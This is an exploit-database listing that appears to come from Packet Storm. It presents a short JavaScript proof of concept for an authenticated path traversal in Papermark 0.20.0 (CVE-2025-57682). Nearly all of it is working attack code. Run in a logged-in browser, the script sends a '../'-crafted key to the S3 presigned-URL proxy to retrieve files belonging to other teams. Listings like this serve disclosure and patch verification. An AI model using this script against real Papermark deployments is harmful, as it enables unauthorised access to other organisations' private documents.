Share
## https://sploitus.com/exploit?id=PACKETSTORM:214538
// Exploit Title: Papermark 0.20.0 - Path Traversal (Authenticated)
    // Date: 2026-01-28
    // Exploit Author: Eui Chul Chung
    // Vendor Homepage: https://www.papermark.com/
    // Software Link: https://github.com/mfts/papermark
    // Version: 0.20.0
    // CVE Identifier: CVE-2025-57682
    
    (async () => {
      const teamId = prompt("Enter team ID");
      const docId = prompt("Enter document ID");
      const fileName = prompt("Enter file name");
    
      const { id } = await fetch("/api/teams", { method: "GET" })
        .then((res) => res.json())
        .then((res) => res[0]);
    
      const { url } = await fetch(`/api/file/s3/get-presigned-get-url-proxy`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ key: `${id}/../${teamId}/${docId}/${fileName}` }),
      }).then((res) => res.json());
    
      window.location.assign(url);
    })();